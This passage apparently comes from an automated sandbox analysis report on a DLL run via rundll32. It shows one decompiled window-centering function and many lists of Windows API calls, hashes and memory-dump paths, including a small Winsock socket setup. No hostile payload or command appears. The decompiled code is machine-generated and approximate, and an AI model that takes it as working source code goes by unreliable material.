                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 656273425-0
                                                                                                                          • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                          • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                          • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                          • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E1001AA48(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                          				signed int _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				struct tagRECT _v28;
                                                                                                                          				struct tagRECT _v44;
                                                                                                                          				struct tagRECT _v60;
                                                                                                                          				struct tagRECT _v80;
                                                                                                                          				char _v100;
                                                                                                                          				void* __edi;
                                                                                                                          				intOrPtr _t58;
                                                                                                                          				struct HWND__* _t59;
                                                                                                                          				intOrPtr _t94;
                                                                                                                          				signed int _t103;
                                                                                                                          				struct HWND__* _t104;
                                                                                                                          				void* _t105;
                                                                                                                          				struct HWND__* _t107;
                                                                                                                          				long _t108;
                                                                                                                          				long _t116;
                                                                                                                          				void* _t119;
                                                                                                                          				struct HWND__* _t121;
                                                                                                                          				void* _t123;
                                                                                                                          				intOrPtr _t125;
                                                                                                                          				intOrPtr _t129;
                                                                                                                          
                                                                                                                          				_t119 = __edx;
                                                                                                                          				_t105 = __ebx;
                                                                                                                          				_t125 = __ecx;
                                                                                                                          				_v12 = __ecx;
                                                                                                                          				_v8 = E1001DDC0(__ecx);
                                                                                                                          				_t58 = _a4;
                                                                                                                          				if(_t58 == 0) {
                                                                                                                          					if((_v8 & 0x40000000) == 0) {
                                                                                                                          						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                                          					} else {
                                                                                                                          						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                                          					}
                                                                                                                          					_t121 = _t59;
                                                                                                                          					if(_t121 != 0) {
                                                                                                                          						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                                          						if(_t104 != 0) {
                                                                                                                          							_t121 = _t104;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                                          					_t121 =  *_t4;
                                                                                                                          				}
                                                                                                                          				_push(_t105);
                                                                                                                          				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                                          				if((_v8 & 0x40000000) != 0) {
                                                                                                                          					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                                          					GetClientRect(_t107,  &_v28);
                                                                                                                          					GetClientRect(_t121,  &_v44);
                                                                                                                          					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                                          				} else {
                                                                                                                          					if(_t121 != 0) {
                                                                                                                          						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                                          						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                                          							_t121 = 0;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_v100 = 0x28;
                                                                                                                          					if(_t121 != 0) {
                                                                                                                          						GetWindowRect(_t121,  &_v44);
                                                                                                                          						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
                                                                                                                          						CopyRect( &_v28,  &_v80);
                                                                                                                          					} else {
                                                                                                                          						_t94 = E10014B42();
                                                                                                                          						if(_t94 != 0) {
                                                                                                                          							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                                          						}
                                                                                                                          						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
                                                                                                                          						CopyRect( &_v44,  &_v80);
                                                                                                                          						CopyRect( &_v28,  &_v80);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t108 = _v60.left;
                                                                                                                          				asm("cdq");
                                                                                                                          				_t123 = _v60.right - _t108;
                                                                                                                          				asm("cdq");
                                                                                                                          				_t120 = _v44.bottom;
                                                                                                                          				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                                          				_a4 = _v60.bottom - _v60.top;
                                                                                                                          				asm("cdq");
                                                                                                                          				asm("cdq");
                                                                                                                          				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                                          				if(_t116 >= _v28.left) {
                                                                                                                          					if(_t123 + _t116 > _v28.right) {
                                                                                                                          						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t116 = _v28.left;
                                                                                                                          				}
                                                                                                                          				if(_t129 >= _v28.top) {
                                                                                                                          					if(_a4 + _t129 > _v28.bottom) {
                                                                                                                          						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t129 = _v28.top;
                                                                                                                          				}
                                                                                                                          				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                          			}

























                                                                                                                          0x1001aac8
                                                                                                                          0x1001aad3
                                                                                                                          0x1001aadc
                                                                                                                          0x1001aadc
                                                                                                                          0x1001aad3
                                                                                                                          0x1001aae0
                                                                                                                          0x1001aae7
                                                                                                                          0x1001ab28
                                                                                                                          0x1001ab37
                                                                                                                          0x1001ab44
                                                                                                                          0x1001aae9
                                                                                                                          0x1001aae9
                                                                                                                          0x1001aaf0
                                                                                                                          0x1001aaf2
                                                                                                                          0x1001aaf2
                                                                                                                          0x1001ab02
                                                                                                                          0x1001ab15
                                                                                                                          0x1001ab1f
                                                                                                                          0x1001ab1f
                                                                                                                          0x1001aae7
                                                                                                                          0x1001ab82
                                                                                                                          0x1001ab87
                                                                                                                          0x1001ab8c
                                                                                                                          0x1001ab90
                                                                                                                          0x1001ab93
                                                                                                                          0x1001ab9a
                                                                                                                          0x1001aba2
                                                                                                                          0x1001abaa
                                                                                                                          0x1001abb2
                                                                                                                          0x1001abb9
                                                                                                                          0x1001abbe
                                                                                                                          0x1001abca
                                                                                                                          0x1001abd2
                                                                                                                          0x1001abd2
                                                                                                                          0x1001abc0
                                                                                                                          0x1001abc0
                                                                                                                          0x1001abc0
                                                                                                                          0x1001abd8
                                                                                                                          0x1001abe7
                                                                                                                          0x1001abef
                                                                                                                          0x1001abef
                                                                                                                          0x1001abda
                                                                                                                          0x1001abda
                                                                                                                          0x1001abda
                                                                                                                          0x1001ac07

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                          • GetParent.USER32(?), ref: 1001AA75
                                                                                                                          • SendMessageA.USER32 ref: 1001AA98
                                                                                                                          • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                          • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                          • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                          • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                          • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 808654186-3887548279
                                                                                                                          • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                          • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                          • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                          • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 100161DE
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                          • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                          • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3191170017-0
                                                                                                                          • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                          • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                          • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                          • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                          • API String ID: 667068680-3617302793
                                                                                                                          • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                          • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                          • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                          • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                          • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                          • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                          • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                          • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                          • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                            • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                            • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                          • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                          • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                          • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                          • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1509511306-0
                                                                                                                          • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                          • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                          • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                          • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                          • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                          • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                            • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                            • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                          • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                          • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                          • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                          • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                            • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                          • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                          • String ID: AfxOldWndProc423
                                                                                                                          • API String ID: 2702501687-1060338832
                                                                                                                          • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                          • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                          • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                          • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                            • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                          • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                          • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                            • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                            • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                          • _printf.LIBCMT ref: 10012F79
                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                          • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                          • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                          • API String ID: 4222005279-2156106531
                                                                                                                          • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                          • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                          • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                          • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                          • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                          • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                          • __lock.LIBCMT ref: 10035229
                                                                                                                          • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                          • API String ID: 1036688887-2843748187
                                                                                                                          • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                          • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                          • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                          • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                          • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                          • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                          • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                          • String ID: MS Shell Dlg
                                                                                                                          • API String ID: 1736106359-76309092
                                                                                                                          • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                          • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                          • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                          • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                          • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                          • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                          • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                          • String ID: System
                                                                                                                          • API String ID: 46613423-3470857405
                                                                                                                          • Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                          • Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
                                                                                                                          • Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                          • Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                          • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
